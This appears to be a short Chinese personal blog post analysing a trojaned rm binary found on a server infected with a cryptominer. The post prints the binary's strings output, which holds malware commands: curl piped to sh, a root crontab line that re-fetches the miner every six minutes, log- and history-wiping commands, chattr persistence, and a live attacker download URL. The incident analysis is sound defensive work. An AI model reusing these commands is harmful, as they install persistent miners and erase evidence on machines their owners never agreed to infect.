rm命令被篡改分析

发表于 2020-04-11  2.09k 次阅读


有台服务中了挖矿后,杀进程删程序,发现删除不了,后面怀疑rm命令有问题进行简单分析确认了命令被替换了,后面将正常rm进行替换后正常,将挖矿程序清除。

异常rm的md5值:

[root@testvm wakuang]# md5sum rm
f3eda9bab1244305d976c4f07b23ce4c  rm

用strings打印rm中内容发现异常:

ulimit -d unlimited
ulimit -m unlimited
ulimit -s unlimited
ulimit -t unlimited
ulimit -v unlimited
ulimit -u unlimited
ulimit -n 1048000
popen %s error
echo 123 > /etc/velog
/etc/velog
/proc/self/exe
Failed
Error opening file
/usr/bin/wget
wget -P 
 -t 3 -T 20 
/usr/bin/get
get -P 
/usr/bin/curl
curl 
 --connect-timeout 10  --max-time 30 --retry 3 > 
/usr/bin/url
url 
ps -fe|grep 
 |grep -v grep|grep -v defunct
cat 
error in fork:%s
error in exec function:%s
chattr -ia 
chmod 777 
chattr +ia 
rm -f 
setsid() failed (errno = %d)
chdir() failed (errno = %d)
history - c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
curl -fsSL --connect-timeout 30 --max-time 30 --retry 3 
 | sh
url -fsSL --connect-timeout 30 --max-time 30 --retry 3 
pkill 
chmod 000 
echo 123aaa >> 
cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c 
dmidecode|grep "System Information" -A9
cat /proc/meminfo
free -m
df -h
ifconfig -a
dmidecode -t bios
strings /usr/lib64/libstdc++.so.6|grep GLIBCXX
cat /proc/uptime
cat /proc/version
lspci | grep Ethernet
top -n 1|head -n 5
cat /etc/issue
chattr -ia /var/spool/cron
chattr -ia /var/spool/cron/root
/var/spool/cron/root
echo >> /var/spool/cron/root
echo "*/6 * * * * curl -fsSL 
 | sh > /dev/null 2>&1 " >> '/var/spool/cron/root'
echo "*/6 * * * * url -fsSL 
cat '/var/spool/cron/root' |grep init.sh
init.sh
chmod 644 /var/spool/cron/root
chattr +ia /var/spool/cron/root
chattr +ia /var/spool/cron
chattr +ia /etc/cron.d
/usr/bin/rmm
QsjeVXG9
http://w.lazer-n.com:43768/init.sh

执行完rm会从公网将挖矿程序以及计划任务全部重新下载一遍,将命令从其他机器拷贝替换恢复rm功能,将挖矿脚本修改将所有程序删除。

本站文章基于国际协议BY-NA-SA 4.0协议共享;
如未特殊说明,本站文章皆为原创文章,请规范转载。

1

scanz个人博客